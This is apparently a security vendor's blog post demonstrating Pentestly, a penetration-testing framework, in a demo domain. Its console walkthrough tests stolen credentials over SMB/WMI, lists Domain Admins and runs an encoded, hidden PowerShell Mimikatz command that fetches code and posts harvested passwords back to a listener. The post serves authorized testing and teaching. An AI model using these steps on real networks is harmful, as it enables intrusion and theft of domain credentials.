Pentestly Framework: When Pentesting Meets Python and Powershell

Python appears to be an ever growing trend in the security community. Being able to connect Python tools together has proven beneficial for us. Powershell has also seen increasingly more use due to its wide availability in internal environments. Pentestly utilizes the power of these tools together in a familiar user experience.

Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:

  • recon-ng – Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation
  • wmiexec.py – Allows us to execute Powershell commands quickly and easily via WMI
  • smbmap.py – Useful utility for enumerating SMB shares
  • Invoke-Mimikatz.ps1 – Implementation of Mimikatz in Powershell

Below is a proof of concept demonstration of using Pentestly to auto detect Domain Admin from Domain User credentials (from Gladius) using Invoke-Mimikatz.

Start playing with Pentestly today: Explore Pentestly on GitHub

Demo – one step at a time

Let’s walk through the demonstration one step at a time.

Import XML

As with any engagement, XML nmap results from our environment are imported into Pentestly:

		[pentestly][demo] > load nmap[pentestly][demo][nmap_xml] > set FILENAME /home/cduplantis/engagement/port-445.xmlFILENAME => /home/cduplantis/engagement/port-445.xml[pentestly][demo][nmap_xml] > run[*] 3 new records added.–––––––SUMMARY–––––––[*] 3 total (3 new) ports found.	

		[pentestly][demo][nmap_xml] > show ports  +––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––+  | rowid |   ip_address   | host | port | protocol |  module  |  +––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––+  | 1     | 10.202.208.4   |      | 445  | tcp      | nmap_xml |  | 2     | 10.202.208.111 |      | 445  | tcp      | nmap_xml |  | 3     | 10.202.208.112 |      | 445  | tcp      | nmap_xml |  +––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––+	

Credentials, credentials, credentials

We begin by attempting to authenticate with the following credentials received from Gladius:

		zojix  nsportsman : password1!	

		[pentestly][demo] > load login[pentestly][demo][login] > set username nsportsman[pentestly][demo][login] > set password password1![pentestly][demo][login] > set domain zojix[pentestly][demo][login] > run	

		[*] Success - nsportsman:password1!@10.202.208.4[*] Fail - nsportsman:password1!@10.202.208.111[*] Success - nsportsman:password1!@10.202.208.112[*] Testing execution access of credentials[*] Execution: zojixnsportsman:password1!@10.202.208.4 - echo[*] Failed to execute: zojixnsportsman:password1!@10.202.208.4[*] Execution: zojixnsportsman:password1!@10.202.208.112 - echo[*] Successful execution: zojixnsportsman:password1!@10.202.208.112	

w00t! The key take away here is the following line:

		[*] Successful execution: zojixnsportsman:password1!@10.202.208.112	

This tells us that we do have execution rights on 10.202.208.112.

WhoDunIt? Domain Admins

One useful cross-reference point is to grab the Domain and Enterprise admin list so that if we come across that user’s credentials in the domain, Pentestly will know that we have Domain Admin credentials.

		[pentestly][demo] > load get_dom # fuzzy searching for get_domain_admin_names[pentestly][demo][get_domain_admin_names] > run	

		[*] Execution: zojixnsportsman:password1!@10.202.208.112 - net groups "Domain Admins" /domain[*] Found Domain Admin: zojixAdministrator[*] Found Domain Admin: zojixTheRealDA[*] Execution: zojixnsportsman:password1!@10.202.208.112 - net groups "Enterprise Admins" /domain[*] Found Enterprise Admin: zojixAdministrator[*] Found Enterprise Admin: zojixTheRealDA	

Mimikatz all the things

For the grand finale, let’s mimikatz the machines that we have execution access.

		[pentestly][demo] > load mimi # Again, fuzzy searching for mimikatz[pentestly][demo][mimikatz] > run	

		[*] Execution: zojixnsportsman:password1!@10.202.208.112 - powershell -window hidden -exec bypass -NonInteractive -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBE…...snip long command…[*] Waiting for Powershell results10.202.208.112 - - [04/Feb/2016 07:56:46] "GET /about.html HTTP/1.1" 200 -10.202.208.112 - - [04/Feb/2016 07:56:50] "POST / HTTP/1.1" 200 -Starting web server	

After parsing the Mimikatz output, Pentestly attempts to cross reference the user list with the Domain Admin list and immediately recognizes a Domain Admin in the Mimikatz output. Here, Mimikatz recognized a Domain Admin logging into a user workstation machine. Silly, DA.

		[*] Success! TheRealDA:<leetpassword>tryGUESSINGthisdrowssaP</leetpassword>  - DOMAIN ADMIN!You have one DA, do you want to continue to find more? [yN]>	

Start playing with Pentestly today: Explore Pentestly on GitHub

icon-praetorian-

See Praetorian in Action

Request a 30-day free trial of our Managed Continuous Threat Exposure Management solution.

About the Authors

Catch the Latest

Catch our latest exploits, news, articles, and events.

Ready to Discuss Your Next Continuous Threat Exposure Management Initiative?

Praetorian’s Offense Security Experts are Ready to Answer Your Questions